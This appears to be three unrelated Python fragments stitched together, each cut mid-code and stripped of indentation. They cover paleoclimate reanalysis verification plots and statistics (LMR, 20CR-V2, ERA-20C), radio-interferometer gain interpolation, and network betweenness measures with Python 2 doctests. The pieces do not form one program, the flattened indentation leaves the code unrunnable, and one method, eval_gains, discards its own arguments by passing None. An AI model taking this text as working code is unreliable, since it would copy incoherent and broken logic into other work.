for i in boolok:
era20c_zm[k,i] = np.nanmean(era20c_trunc[i,:],axis=1)
era20c_zm[k,boolnotok] = np.NAN
if iplot_loc:
ncints = 30
cmap = 'bwr'
nticks = 6 # number of ticks on the colorbar
# set contours based on 20CR
maxabs = np.nanmax(np.abs(tcr_trunc))
# round the contour interval, and then set limits to fit
dc = np.round(maxabs*2/ncints,2)
cl = dc*ncints/2.
cints = np.linspace(-cl,cl,ncints,endpoint=True)
# compare LMR and TCR and ERA20C
fig = plt.figure()
ax = fig.add_subplot(2,2,1)
m1 = bm.Basemap(projection='robin',lon_0=0)
# maxabs = np.nanmax(np.abs(lmr_trunc))
cs = m1.contourf(lon2_new,lat2_new,lmr_trunc,cints,cmap=plt.get_cmap(cmap),vmin=-maxabs,vmax=maxabs)
m1.drawcoastlines()
cb = m1.colorbar(cs)
tick_locator = ticker.MaxNLocator(nbins=nticks)
cb.locator = tick_locator
cb.ax.yaxis.set_major_locator(matplotlib.ticker.AutoLocator())
cb.update_ticks()
ax.set_title('LMR '+verif_dict[var][1]+' '+str(ntrunc_new) + ' ' + str(yr))
ax = fig.add_subplot(2,2,2)
m2 = bm.Basemap(projection='robin',lon_0=0)
# maxabs = np.nanmax(np.abs(tcr_trunc))
cs = m2.contourf(lon2_new,lat2_new,tcr_trunc,cints,cmap=plt.get_cmap(cmap),vmin=-maxabs,vmax=maxabs)
m2.drawcoastlines()
cb = m1.colorbar(cs)
tick_locator = ticker.MaxNLocator(nbins=nticks)
cb.locator = tick_locator
cb.ax.yaxis.set_major_locator(matplotlib.ticker.AutoLocator())
cb.update_ticks()
ax.set_title('20CR-V2 '+verif_dict[var][1]+' '+str(ntrunc_new) + ' ' + str(yr))
ax = fig.add_subplot(2,2,3)
m3 = bm.Basemap(projection='robin',lon_0=0)
# maxabs = np.nanmax(np.abs(gis_trunc))
cs = m3.contourf(lon2_new,lat2_new,era20c_trunc,cints,cmap=plt.get_cmap(cmap),vmin=-maxabs,vmax=maxabs)
m3.drawcoastlines()
cb = m1.colorbar(cs)
tick_locator = ticker.MaxNLocator(nbins=nticks)
cb.locator = tick_locator
cb.ax.yaxis.set_major_locator(matplotlib.ticker.AutoLocator())
cb.update_ticks()
ax.set_title('ERA20C '+verif_dict[var][1]+' '+str(ntrunc_new) + ' ' + str(yr))
plt.clim(-maxabs,maxabs)
# get these numbers by adjusting the figure interactively!!!
plt.subplots_adjust(left=0.05, bottom=0.45, right=0.95, top=0.95, wspace=0.1, hspace=0.0)
# plt.tight_layout(pad=0.3)
fig.suptitle(verif_dict[var][1] + ' for ' +str(nya) +' year centered average')
# anomaly correlation
lmrvec = np.reshape(lmr_trunc,(1,nlat_new*nlon_new))
tcrvec = np.reshape(tcr_trunc,(1,nlat_new*nlon_new))
era20cvec = np.reshape(era20c_trunc,(1,nlat_new*nlon_new))
# lmr <-> tcr
indok = np.isfinite(tcrvec); nbok = np.sum(indok); nball = tcrvec.shape[1]
ratio = float(nbok)/float(nball)
if ratio > valid_frac:
lt_csave[k] = np.corrcoef(lmrvec[indok],tcrvec[indok])[0,1]
else:
lt_csave[k] = np.nan
print(' lmr-tcr correlation : %s' % str(lt_csave[k]))
# lmr <-> era
indok = np.isfinite(era20cvec); nbok = np.sum(indok); nball = era20cvec.shape[1]
ratio = float(nbok)/float(nball)
if ratio > valid_frac:
le_csave[k] = np.corrcoef(lmrvec[indok],era20cvec[indok])[0,1]
else:
le_csave[k] = np.nan
print(' lmr-era correlation : %s' % str(le_csave[k]))
# tcr <-> era
indok = np.isfinite(era20cvec); nbok = np.sum(indok); nball = era20cvec.shape[1]
ratio = float(nbok)/float(nball)
if ratio > valid_frac:
te_csave[k] = np.corrcoef(tcrvec[indok],era20cvec[indok])[0,1]
else:
te_csave[k] = np.nan
print(' tcr-era correlation : %s' % str(te_csave[k]))
# plots for anomaly correlation statistics
# number of bins in the histograms
nbins = 15
corr_range = [-0.6,1.0]
bins = np.linspace(corr_range[0],corr_range[1],nbins)
# LMR compared to TCR and ERA20C
fig = plt.figure()
# TCR
ax = fig.add_subplot(3,2,1)
ax.plot(cyears,lt_csave,lw=2)
ax.plot([trange[0],trange[-1]],[0,0],'k:')
ax.set_title('LMR - 20CR-V2')
ax.set_xlim(trange[0],trange[-1])
ax.set_ylim(corr_range[0],corr_range[-1])
ax.set_ylabel('Correlation',fontweight='bold')
#
ax = fig.add_subplot(3,2,2)
ax.hist(lt_csave[~np.isnan(lt_csave)],bins=bins,histtype='stepfilled',alpha=0.25)
ax.set_title('LMR - 20CR-V2')
ax.set_xlim(corr_range[0],corr_range[-1])
ax.set_ylabel('Counts',fontweight='bold')
xmin,xmax = ax.get_xlim()
ymin,ymax = ax.get_ylim()
ypos = ymax-0.15*(ymax-ymin)
xpos = xmin+0.025*(xmax-xmin)
ax.text(xpos,ypos,'Mean = %s' %"{:.2f}".format(np.nanmean(lt_csave)),fontsize=11,fontweight='bold')
# ERA20C
ax = fig.add_subplot(3,2,3)
ax.plot(cyears,le_csave,lw=2)
ax.plot([trange[0],trange[-1]],[0,0],'k:')
ax.set_title('LMR - ERA-20C')
ax.set_xlim(trange[0],trange[-1])
ax.set_ylim(corr_range[0],corr_range[-1])
ax.set_ylabel('Correlation',fontweight='bold')
#
ax = fig.add_subplot(3,2,4)
ax.hist(le_csave[~np.isnan(le_csave)],bins=bins,histtype='stepfilled',alpha=0.25)
ax.set_title('LMR - ERA-20C')
ax.set_xlim(corr_range[0],corr_range[-1])
ax.set_ylabel('Counts',fontweight='bold')
xmin,xmax = ax.get_xlim()
ymin,ymax = ax.get_ylim()
ypos = ymax-0.15*(ymax-ymin)
xpos = xmin+0.025*(xmax-xmin)
ax.text(xpos,ypos,'Mean = %s' %"{:.2f}".format(np.nanmean(le_csave)),fontsize=11,fontweight='bold')
# ERA20C compared to TCR
ax = fig.add_subplot(3,2,5)
ax.plot(cyears,te_csave,lw=2)
ax.plot([trange[0],trange[-1]],[0,0],'k:')
ax.set_title('ERA-20C - 20CR-V2')
ax.set_xlim(trange[0],trange[-1])
ax.set_ylim(corr_range[0],corr_range[-1])
ax.set_ylabel('Correlation',fontweight='bold')
ax.set_xlabel('Year CE',fontweight='bold')
#
ax = fig.add_subplot(3,2,6)
ax.hist(te_csave[~np.isnan(te_csave)],bins=bins,histtype='stepfilled',alpha=0.25)
ax.set_title('ERA-20C - 20CR-V2')
ax.set_xlim(corr_range[0],corr_range[-1])
ax.set_ylabel('Counts',fontweight='bold')
ax.set_xlabel('Correlation',fontweight='bold')
xmin,xmax = ax.get_xlim()
ymin,ymax = ax.get_ylim()
ypos = ymax-0.15*(ymax-ymin)
xpos = xmin+0.025*(xmax-xmin)
ax.text(xpos,ypos,'Mean = %s' %"{:.2f}".format(np.nanmean(te_csave)),fontsize=11,fontweight='bold')
#fig.tight_layout()
plt.subplots_adjust(left=0.1, bottom=0.45, right=0.95, top=0.93, wspace=0.5, hspace=0.5)
fig.suptitle(verif_dict[var][2]+' anomaly correlation',fontweight='bold')
if fsave:
print('saving to .png')
plt.savefig(nexp+'_verify_grid_'+verif_dict[var][1]+'_anomaly_correlation_LMR_'+str(trange[0])+'-'+str(trange[1])+'.png')
plt.savefig(nexp+'_verify_grid_'+verif_dict[var][1]+'_anomaly_correlation_LMR_'+str(trange[0])+'-'+str(trange[1])+'.pdf', bbox_inches='tight', dpi=300, format='pdf')
plt.close()
# =======================================================================================================
# For paper 1 :
fig = plt.figure()
# TCR
ax = fig.add_subplot(2,2,1)
ax.plot(cyears,lt_csave,lw=2)
ax.plot([trange[0],trange[-1]],[0,0],'k:')
ax.set_title('LMR - 20CR-V2')
ax.set_xlim(trange[0],trange[-1])
ax.set_ylim(corr_range[0],corr_range[-1])
ax.set_ylabel('Correlation',fontweight='bold')
ax = fig.add_subplot(2,2,2)
ax.hist(lt_csave[~np.isnan(lt_csave)],bins=bins,histtype='stepfilled',alpha=0.25)
ax.set_title('LMR - 20CR-V2')
ax.set_xlim(corr_range[0],corr_range[-1])
ax.set_ylabel('Counts',fontweight='bold')
xmin,xmax = ax.get_xlim()
ymin,ymax = ax.get_ylim()
ypos = ymax-0.15*(ymax-ymin)
xpos = xmin+0.025*(xmax-xmin)
ax.text(xpos,ypos,'Mean = %s' %"{:.2f}".format(np.nanmean(lt_csave)),fontsize=11,fontweight='bold')
# ERA20C
ax = fig.add_subplot(2,2,3)
ax.plot(cyears,le_csave,lw=2)
ax.plot([trange[0],trange[-1]],[0,0],'k:')
ax.set_title('LMR - ERA-20C')
ax.set_xlim(trange[0],trange[-1])
ax.set_ylim(corr_range[0],corr_range[-1])
ax.set_ylabel('Correlation',fontweight='bold')
ax.set_xlabel('Year CE',fontweight='bold')
#
ax = fig.add_subplot(2,2,4)
ax.hist(le_csave[~np.isnan(le_csave)],bins=bins,histtype='stepfilled',alpha=0.25)
ax.set_title('LMR - ERA-20C')
ax.set_xlim(corr_range[0],corr_range[-1])
ax.set_ylabel('Counts',fontweight='bold')
ax.set_xlabel('Correlation',fontweight='bold')
xmin,xmax = ax.get_xlim()
ymin,ymax = ax.get_ylim()
ypos = ymax-0.15*(ymax-ymin)
xpos = xmin+0.025*(xmax-xmin)
ax.text(xpos,ypos,'Mean = %s' %"{:.2f}".format(np.nanmean(le_csave)),fontsize=11,fontweight='bold')
fig.tight_layout()
plt.subplots_adjust(left=0.1, bottom=0.45, right=0.95, top=0.93, wspace=0.5, hspace=0.5)
fig.suptitle(verif_dict[var][2]+' anomaly correlation',fontweight='bold')
plt.savefig(nexp+'_verify_grid_'+verif_dict[var][1]+'_anomaly_correlation_LMR_'+str(trange[0])+'-'+str(trange[1])+'_paper.png')
plt.savefig(nexp+'_verify_grid_'+verif_dict[var][1]+'_anomaly_correlation_LMR_'+str(trange[0])+'-'+str(trange[1])+'_paper.pdf', bbox_inches='tight', dpi=300, format='pdf')
plt.close()
# =======================================================================================================
#
# BEGIN bias, r and CE calculations
#
# correlation and CE at each (lat,lon) point
lt_err = lmr_allyears - tcr_allyears
le_err = lmr_allyears - era20c_allyears
te_err = tcr_allyears - era20c_allyears
r_lt = np.zeros([nlat_new,nlon_new])
ce_lt = np.zeros([nlat_new,nlon_new])
r_le = np.zeros([nlat_new,nlon_new])
ce_le = np.zeros([nlat_new,nlon_new])
r_te = np.zeros([nlat_new,nlon_new])
ce_te = np.zeros([nlat_new,nlon_new])
# bias
# CE
ce_lt = coefficient_efficiency(tcr_allyears,lmr_allyears)
ce_le = coefficient_efficiency(era20c_allyears,lmr_allyears)
ce_te = coefficient_efficiency(era20c_allyears,tcr_allyears)
# Correlation
for la in range(nlat_new):
for lo in range(nlon_new):
# LMR-TCR
indok = np.isfinite(tcr_allyears[:,la,lo])
nbok = np.sum(indok)
nball = lmr_allyears[:,la,lo].shape[0]
ratio = float(nbok)/float(nball)
if ratio > valid_frac:
r_lt[la,lo] = np.corrcoef(lmr_allyears[indok,la,lo],tcr_allyears[indok,la,lo])[0,1]
else:
r_lt[la,lo] = np.nan
# LMR-ERA20C
indok = np.isfinite(era20c_allyears[:,la,lo])
nbok = np.sum(indok)
nball = lmr_allyears[:,la,lo].shape[0]
ratio = float(nbok)/float(nball)
if ratio > valid_frac:
r_le[la,lo] = np.corrcoef(lmr_allyears[indok,la,lo],era20c_allyears[indok,la,lo])[0,1]
else:
r_le[la,lo] = np.nan
# TCR-ERA20C
indok = np.isfinite(era20c_allyears[:,la,lo])
nbok = np.sum(indok)
nball = tcr_allyears[:,la,lo].shape[0]
ratio = float(nbok)/float(nball)
if ratio > valid_frac:
r_te[la,lo] = np.corrcoef(tcr_allyears[indok,la,lo],era20c_allyears[indok,la,lo])[0,1]
else:
r_te[la,lo] = np.nan
# median
lat_trunc = np.squeeze(lat2_new[:,0])
indlat = np.where((lat_trunc[:] > -60.0) & (lat_trunc[:] < 60.0))
lt_rmedian = str(float('%.2g' % np.median(np.median(r_lt)) ))
print('lmr-tcr all-grid median r : %s' % str(lt_rmedian))
lt_rmedian60 = str(float('%.2g' % np.median(np.median(r_lt[indlat,:])) ))
print('lmr-tcr 60S-60N median r : %s' % str(lt_rmedian60))
lt_cemedian = str(float('%.2g' % np.median(np.median(ce_lt)) ))
print('lmr-tcr all-grid median ce : %s' % str(lt_cemedian))
lt_cemedian60 = str(float('%.2g' % np.median(np.median(ce_lt[indlat,:])) ))
print('lmr-tcr 60S-60N median ce : %s' % str(lt_cemedian60))
le_rmedian = str(float('%.2g' % np.median(np.median(r_le)) ))
print('lmr-era20c all-grid median r : %s' % str(le_rmedian))
le_rmedian60 = str(float('%.2g' % np.median(np.median(r_le[indlat,:])) ))
print('lmr-era20c 60S-60N median r : %s' % str(le_rmedian60))
le_cemedian = str(float('%.2g' % np.median(np.median(ce_le)) ))
print('lmr-era20c all-grid median ce : %s' % str(le_cemedian))
le_cemedian60 = str(float('%.2g' % np.median(np.median(ce_le[indlat,:])) ))
print('lmr-era20c 60S-60N median ce : %s' % str(le_cemedian60))
te_rmedian = str(float('%.2g' % np.median(np.median(r_te)) ))
print('tcr-era20c all-grid median r : %s' % str(te_rmedian))
te_rmedian60 = str(float('%.2g' % np.median(np.median(r_te[indlat,:])) ))
print('tcr-era20c 60S-60N median r : %s' % str(te_rmedian60))
te_cemedian = str(float('%.2g' % np.median(np.median(ce_te)) ))
print('tcr-era20c all-grid median ce : %s' % str(te_cemedian))
te_cemedian60 = str(float('%.2g' % np.median(np.median(ce_te[indlat,:])) ))
print('tcr-era20c 60S-60N median ce : %s' % str(te_cemedian60))
# | |
tgrid.ravel()
fvec = fgrid.ravel()
if key == 'antenna-based':
ind1 = NMO.find_list_in_list(labels, a1_labels)
ind2 = NMO.find_list_in_list(labels, a2_labels)
if NP.sum(ind1.mask) > 0:
raise IndexError('Some antenna gains could not be found')
if NP.sum(ind2.mask) > 0:
raise IndexError('Some antenna gains could not be found')
g1_conj = None
g2 = None
for i in xrange(ind1.size):
if self.splinefuncs[key]['dims'].size == 1:
if g1_conj is None:
g1_conj = (self.splinefuncs[key]['interp']['real'][ind1[i]](inp) - 1j * self.splinefuncs[key]['interp']['imag'][ind1[i]](inp)).reshape(1,nchan,ntimes)
g2 = (self.splinefuncs[key]['interp']['real'][ind2[i]](inp) + 1j * self.splinefuncs[key]['interp']['imag'][ind2[i]](inp)).reshape(1,nchan,ntimes)
else:
g1_conj = NP.concatenate((g1_conj, (self.splinefuncs[key]['interp']['real'][ind1[i]](inp) - 1j * self.splinefuncs[key]['interp']['imag'][ind1[i]](inp)).reshape(1,nchan,ntimes)), axis=0)
g2 = NP.concatenate((g2, (self.splinefuncs[key]['interp']['real'][ind2[i]](inp) + 1j * self.splinefuncs[key]['interp']['imag'][ind2[i]](inp)).reshape(1,nchan,ntimes)), axis=0)
else:
if g1_conj is None:
g1_conj = (self.splinefuncs[key]['interp']['real'][ind1[i]].ev(tvec,fvec) - 1j * self.splinefuncs[key]['interp']['imag'][ind1[i]].ev(tvec,fvec)).reshape(1,nchan,ntimes)
g2 = (self.splinefuncs[key]['interp']['real'][ind2[i]].ev(tvec,fvec) + 1j * self.splinefuncs[key]['interp']['imag'][ind2[i]].ev(tvec,fvec)).reshape(1,nchan,ntimes)
else:
g1_conj = NP.concatenate((g1_conj, (self.splinefuncs[key]['interp']['real'][ind1[i]].ev(tvec,fvec) - 1j * self.splinefuncs[key]['interp']['imag'][ind1[i]].ev(tvec,fvec)).reshape(1,nchan,ntimes)), axis=0)
g2 = NP.concatenate((g2, (self.splinefuncs[key]['interp']['real'][ind2[i]].ev(tvec,fvec) + 1j * self.splinefuncs[key]['interp']['imag'][ind2[i]].ev(tvec,fvec)).reshape(1,nchan,ntimes)), axis=0)
blgains = blgains * g1_conj * g2 * NP.ones((1,nchan,ntimes), dtype=NP.complex)
else:
g12 = None
for labelind,label in enumerate(bl_labels):
if label in labels:
ind = NP.where(self.gaintable[key]['label'] == label)[0]
if self.splinefuncs[key]['dims'].size == 1:
if g12 is None:
g12 = (self.splinefuncs[key]['interp']['real'][ind[0]](inp) + 1j * self.splinefuncs[key]['interp']['imag'][ind[0]](inp)).reshape(1,nchan,ntimes)
else:
g12 = NP.concatenate((g12, (self.splinefuncs[key]['interp']['real'][ind[0]](inp) + 1j * self.splinefuncs[key]['interp']['imag'][ind[0]](inp)).reshape(1,nchan,ntimes)), axis=0)
else:
if g12 is None:
g12 = (self.splinefuncs[key]['interp']['real'][ind[0]].ev(tvec,fvec) + 1j * self.splinefuncs[key]['interp']['imag'][ind[0]].ev(tvec,fvec)).reshape(1,nchan,ntimes)
else:
g12 = NP.concatenate((g12, (self.splinefuncs[key]['interp']['real'][ind[0]].ev(tvec,fvec) + 1j * self.splinefuncs[key]['interp']['imag'][ind[0]].ev(tvec,fvec)).reshape(1,nchan,ntimes)), axis=0)
elif NP.asarray([tuple(reversed(label))], dtype=bl_labels.dtype)[0] in labels:
ind = NP.where(labels == NP.asarray([tuple(reversed(label))], dtype=bl_labels.dtype)[0])[0]
if self.splinefuncs[key]['dims'].size == 1:
if g12 is None:
g12 = (self.splinefuncs[key]['interp']['real'][ind[0]](inp) - 1j * self.splinefuncs[key]['interp']['imag'][ind[0]](inp)).reshape(1,nchan,ntimes)
else:
g12 = NP.concatenate((g12, (self.splinefuncs[key]['interp']['real'][ind[0]](inp) - 1j * self.splinefuncs[key]['interp']['imag'][ind[0]](inp)).reshape(1,nchan,ntimes)), axis=0)
else:
if g12 is None:
g12 = (self.splinefuncs[key]['interp']['real'][ind[0]].ev(tvec,fvec) - 1j * self.splinefuncs[key]['interp']['imag'][ind[0]].ev(tvec,fvec)).reshape(1,nchan,ntimes)
else:
g12 = NP.concatenate((g12, (self.splinefuncs[key]['interp']['real'][ind[0]].ev(tvec,fvec) - 1j * self.splinefuncs[key]['interp']['imag'][ind[0]].ev(tvec,fvec)).reshape(1,nchan,ntimes)), axis=0)
else:
if g12 is None:
g12 = NP.ones((1,nchan,ntimes), dtype=NP.complex)
else:
g12 = NP.concatenate((g12, NP.ones((1,nchan,ntimes), dtype=NP.complex)), axis=0)
blgains = blgains * g12 * NP.ones((1,nchan,ntimes), dtype=NP.complex)
interp_axes_order = ['label', 'frequency', 'time']
if axes_order is None:
axes_order = self.gaintable['antenna-based']['ordering']
elif not isinstance(axes_order, (list, NP.ndarray)):
raise TypeError('axes_order must be a list')
else:
if len(axes_order) != 3:
raise ValueError('axes_order must be a three element list')
for orderkey in ['label', 'frequency', 'time']:
if orderkey not in axes_order:
raise ValueError('axes_order does not contain key "{0}"'.format(orderkey))
transpose_order = NMO.find_list_in_list(interp_axes_order, axes_order)
blgains = NP.transpose(blgains, axes=transpose_order)
return blgains
#############################################################################
def nearest_gains(self, bl_labels, freqs=None, times=None, axes_order=None):
"""
------------------------------------------------------------------------
Extract complex instrument gains for given baselines from the gain table
determined by nearest neighbor logic
Inputs:
bl_labels [Numpy structured array tuples] Labels of antennas in the
pair used to produce the baseline vector under fields 'A2'
and 'A1' for second and first antenna respectively. The
baseline vector is obtained by position of antennas under
'A2' minus position of antennas under 'A1'
freqs [None or numpy array] Array of frequencies at which the
gains are to be interpolated using the attribute
splinefuncs. If set to None (default), all frequencies in
the gaintable are assumed. The specified frequencies must
always lie within the range which was used in creating the
interpolation functions, otherwise an exception will be
raised. The array is of size nchan
times [None or numpy array] Array of times at which the gains
are to be interpolated using the attribute splinefuncs. If
set to None (default), all times in the gaintable are
assumed. The specified times must always lie within the
range which was used in creating the interpolation
functions, otherwise an exception will be raised. The array
is of size nts
axes_order [None or list or numpy array] Axes ordering for extracted
gains. It must contain the three elements 'label',
'frequency', and 'time'. If set to None, it will be
returned in the same order as in the input gaintable.
Outputs:
[numpy array] Complex gains of shape nbl x nchan x nts for the specified
baselines, frequencies and times.
------------------------------------------------------------------------
"""
try:
bl_labels
except NameError:
raise NameError('Input bl_labels must be specified')
blgains = NP.asarray(1.0).reshape(1,1,1)
if self.gaintable is not None:
a1_labels = bl_labels['A1']
a2_labels = bl_labels['A2']
for gainkey in ['antenna-based', 'baseline-based']:
if gainkey in self.gaintable:
temp_axes_order = ['label', 'frequency', 'time']
inp_order = self.gaintable[gainkey]['ordering']
temp_transpose_order = NMO.find_list_in_list(inp_order, temp_axes_order)
if NP.all(inp_order == temp_axes_order):
gains = NP.copy(self.gaintable[gainkey]['gains'])
else:
gains = NP.transpose(NP.copy(self.gaintable[gainkey]['gains']), axes=temp_transpose_order)
freqs_to_search = copy.copy(freqs)
if freqs_to_search is None:
freqs_to_search = copy.copy(self.gaintable[gainkey]['frequency'])
if freqs_to_search is not None:
if self.gaintable[gainkey]['frequency'] is not None:
inpind, refind_freqs, distNN= LKP.find_1NN(self.gaintable[gainkey]['frequency'].reshape(-1,1), freqs_to_search.reshape(-1,1), remove_oob=True)
else:
refind_freqs = None
if refind_freqs is None:
refind_freqs = NP.arange(gains.shape[1])
times_to_search = copy.copy(times)
if times_to_search is None:
times_to_search = copy.copy(self.gaintable[gainkey]['time'])
if times_to_search is not None:
if self.gaintable[gainkey]['time'] is not None:
inpind, refind_times, distNN = LKP.find_1NN(self.gaintable[gainkey]['time'].reshape(-1,1), times_to_search.reshape(-1,1), remove_oob=True)
else:
refind_times = None
if refind_times is None:
refind_times = NP.arange(gains.shape[2])
if gains.shape[0] == 1:
blgains = blgains * gains[:,refind_freqs,refind_times].reshape(1,refind_freqs.size,refind_times.size)
else:
labels = self.gaintable[gainkey]['label']
if gainkey == 'antenna-based':
ind1 = NMO.find_list_in_list(labels, a1_labels)
ind2 = NMO.find_list_in_list(labels, a2_labels)
if NP.sum(ind1.mask) > 0:
raise IndexError('Some antenna gains could not be found')
if NP.sum(ind2.mask) > 0:
raise IndexError('Some antenna gains could not be found')
blgains = blgains * gains[NP.ix_(ind2,refind_freqs,refind_times)].reshape(ind2.size,refind_freqs.size,refind_times.size) * gains[NP.ix_(ind1,refind_freqs,refind_times)].conj().reshape(ind1.size,refind_freqs.size,refind_times.size)
else:
labels_conj = [tuple(reversed(label)) for label in labels]
labels_conj = NP.asarray(labels_conj, dtype=labels.dtype)
labels_conj_appended = NP.concatenate((labels, labels_conj), axis=0)
gains_conj_appended = NP.concatenate((gains, gains.conj()), axis=0)
ind = NMO.find_list_in_list(labels_conj_appended, bl_labels)
selected_gains = gains_conj_appended[NP.ix_(ind.compressed(),refind_freqs,refind_times)]
if ind.compressed().size == 1:
selected_gains = selected_gains.reshape(NP.sum(~ind.mask),refind_freqs.size,refind_times.size)
blgains[~ind.mask, ...] = blgains[~ind.mask, ...] * selected_gains
if axes_order is None:
axes_order = inp_order
elif not isinstance(axes_order, (list, NP.ndarray)):
raise TypeError('axes_order must be a list')
else:
if len(axes_order) != 3:
raise ValueError('axes_order must be a three element list')
for orderkey in ['label', 'frequency', 'time']:
if orderkey not in axes_order:
raise ValueError('axes_order does not contain key "{0}"'.format(orderkey))
transpose_order = NMO.find_list_in_list(inp_order, axes_order)
blgains = NP.transpose(blgains, axes=transpose_order)
return blgains
#############################################################################
def eval_gains(self, bl_labels, freq_index=None, time_index=None,
axes_order=None):
"""
------------------------------------------------------------------------
Extract complex instrument gains for given baselines from the gain table
Inputs:
bl_labels [Numpy structured array tuples] Labels of antennas in the
pair used to produce the baseline vector under fields 'A2'
and 'A1' for second and first antenna respectively. The
baseline vector is obtained by position of antennas under
'A2' minus position of antennas under 'A1'
freq_index [None, int, list or numpy array] Index (scalar) or indices
(list or numpy array) along the frequency axis at which
gains are to be extracted. If set to None, gains at all
frequencies in the gain table will be extracted.
time_index [None, int, list or numpy array] Index (scalar) or indices
(list or numpy array) along the time axis at which gains
are to be extracted. If set to None, gains at all timesin
the gain table will be extracted.
axes_order [None or list or numpy array] Axes ordering for extracted
gains. It must contain the three elements 'label',
'frequency', and 'time'. If set to None, it will be
returned in the same order as in the input gaintable.
Outputs:
[numpy array] Complex gains of shape nbl x nchan x nts for the specified
baselines, frequencies and times.
------------------------------------------------------------------------
"""
return extract_gains(self.gaintable, bl_labels, freq_index=None,
time_index=None, axes_order=None)
#############################################################################
def write_gaintable(self, outfile, axes_order=None, compress=True,
compress_fmt='gzip', compress_opts=9):
"""
------------------------------------------------------------------------
Write gain table with specified axes ordering to external file in HDF5
format
Inputs:
outfile [string] Filename including full path into which the gain
table will be written
axes_order [None or list or numpy array] The axes ordering of gain
table that will be written to external file specified in
outfile. If set to None, it will store in the same order
as in the attribute gaintable
compress [boolean] Specifies if the gain table is written in
compressed format. The compression format and compression
parameters are specified in compress_fmt and compress_opts
respectively
compress_fmt
[string] Accepted values are 'gzip' (default) or 'lzf'. See
h5py module documentation for comparison of these
compression formats
compress_opts
[integer] Applies only if compress_fmt is set to 'gzip'. It
must be an integer in the range 0 to 9. Default=9 implies
maximum compression
------------------------------------------------------------------------
"""
try:
outfile
except NameError:
raise NameError('outfile not specified')
if axes_order is not None:
if not isinstance(axes_order, (list, NP.ndarray)):
raise TypeError('axes_order must be a list')
else:
if len(axes_order) | |
0 and 1
:return: Entry [i,j] is the betweenness of the link between i and j,
or 0 if i is not linked to j.
"""
# Calculate link betweenness
link_betweenness = self.graph.edge_betweenness()
# Initialize
result, ecount = np.zeros((self.N, self.N)), 0
# Get graph adjacency list
A_list = self.graph.get_adjlist()
# Write link betweenness values to matrix
for i in xrange(len(A_list)):
for j in A_list[i]:
# Only visit links once
if i < j:
result[i, j] = result[j, i] = link_betweenness[ecount]
ecount += 1
return result
def edge_betweenness(self):
"""
For each link, return its betweenness.
Alias to :meth:`link_betweenness`. This measures on how likely the
link is on a randomly chosen shortest path in the network.
(Does not respect directionality of links.)
**Example:**
>>> print Network.SmallTestNetwork().edge_betweenness()
Calculating link betweenness...
[[ 0. 0. 0. 3.5 5.5 5. ] [ 0. 0. 2. 3.5 2.5 0. ]
[ 0. 2. 0. 0. 3. 0. ] [ 3.5 3.5 0. 0. 0. 0. ]
[ 5.5 2.5 3. 0. 0. 0. ] [ 5. 0. 0. 0. 0. 0. ]]
:rtype: square numpy array [node,node] of floats between 0 and 1
:return: Entry [i,j] is the betweenness of the link between i and j,
or 0 if i is not linked to j.
"""
return self.link_betweenness()
#
# Node valued centrality measures
#
@cached_const('base', 'btw', 'node betweenness')
def betweenness(self, no_big_int=True):
"""
For each node, return its betweenness.
This measures roughly how many shortest paths pass through the node.
**Example:**
>>> Network.SmallTestNetwork().betweenness()
Calculating node betweenness...
array([ 4.5, 1.5, 0. , 1. , 3. , 0. ])
:arg bool no_big_int: Toggles use of big integer calculation (slow if
False).
:rtype: 1d numpy array [node] of floats >= 0
"""
# Return the absolute value of normed tbc, since a bug sometimes
# results in negative signs
# The measure is normed by the maximum betweenness centrality achieved
# only by the star (Freeman 1978): (n**2-3*n+2)/2
# This restricts TBC to 0 <= TBC <= 1
# maxTBC = ( self.N**2 - 3 * self.N + 2 ) / 2
return np.abs(np.array(self.graph.betweenness(nobigint=no_big_int)))
@cached_const('base', 'inter btw', 'interregional betweenness')
def interregional_betweenness(self, sources=None, targets=None):
"""
For each node, return its interregional betweenness for given sets
of source and target nodes.
This measures roughly how many shortest paths from one of the sources
to one of the targets pass through the node.
**Examples:**
>>> Network.SmallTestNetwork().interregional_betweenness(
... sources=[2], targets=[3,5])
Calculating interregional betweenness...
array([ 1., 1., 0., 0., 1., 0.])
>>> Network.SmallTestNetwork().interregional_betweenness(
... sources=range(0,6), targets=range(0,6))
Calculating interregional betweenness...
array([ 9., 3., 0., 2., 6., 0.])
as compared to
>>> Network.SmallTestNetwork().betweenness()
Calculating node betweenness...
array([ 4.5, 1.5, 0. , 1. , 3. , 0. ])
:type sources: 1d numpy array or list of ints from 0 to n_nodes-1
:arg sources: Set of source node indices.
:type targets: 1d numpy array or list of ints from 0 to n_nodes-1
:arg targets: Set of target node indices.
:rtype: 1d numpy array [node] of floats between 0 and 1
"""
return self.nsi_betweenness(sources=sources, targets=targets,
aw=0, silent=1)
@cached_const('nsi', 'inter btw', 'n.s.i. interregional betweenness')
def nsi_interregional_betweenness(self, sources, targets):
"""
For each node, return its n.s.i. interregional betweenness for given
sets of source and target nodes.
This measures roughly how many shortest paths from one of the sources
to one of the targets pass through the node, taking node weights into
account.
**Example:**
>>> r(Network.SmallTestNetwork().nsi_interregional_betweenness(
... sources=[2], targets=[3,5]))
Calculating n.s.i. interregional betweenness...
array([ 3.1667, 2.3471, 0. , 0. , 2.0652, 0. ])
as compared to the unweighted version:
>>> Network.SmallTestNetwork().interregional_betweenness(
... sources=[2], targets=[3,5])
Calculating interregional betweenness...
array([ 1., 1., 0., 0., 1., 0.])
:rtype: 1d numpy array [node] of floats between 0 and 1
"""
return self.nsi_betweenness(sources=sources, targets=targets, silent=1)
def nsi_betweenness(self, **kwargs):
"""
For each node, return its n.s.i. betweenness.
This measures roughly how many shortest paths pass through the node,
taking node weights into account.
**Example:**
>>> net = Network.SmallTestNetwork()
>>> r(net.nsi_betweenness())
Calculating n.s.i. betweenness...
array([ 29.6854, 7.7129, 0. , 3.0909, 9.6996, 0. ])
>>> r(net.splitted_copy().nsi_betweenness())
Calculating n.s.i. betweenness...
array([ 29.6854, 7.7129, 0. , 3.0909, 9.6996, 0. , 0. ])
as compared to the unweighted version:
>>> net = Network.SmallTestNetwork()
>>> net.betweenness()
Calculating node betweenness...
array([ 4.5, 1.5, 0. , 1. , 3. , 0. ])
>>> net.splitted_copy().betweenness()
Calculating node betweenness...
array([ 8.5, 1.5, 0. , 1.5, 4.5, 0. , 0. ])
:rtype: 1d numpy array [node] of floats between 0 and 1
"""
if self.silence_level <= 1:
if "silent" not in kwargs:
print "Calculating n.s.i. betweenness..."
w = self.node_weights
if "aw" in kwargs:
if kwargs["aw"] == 0:
w = 0.0*w + 1.0
N, k = self.N, self.degree()
rN = range(0, N)
zn = np.zeros(N, dtype=np.float)
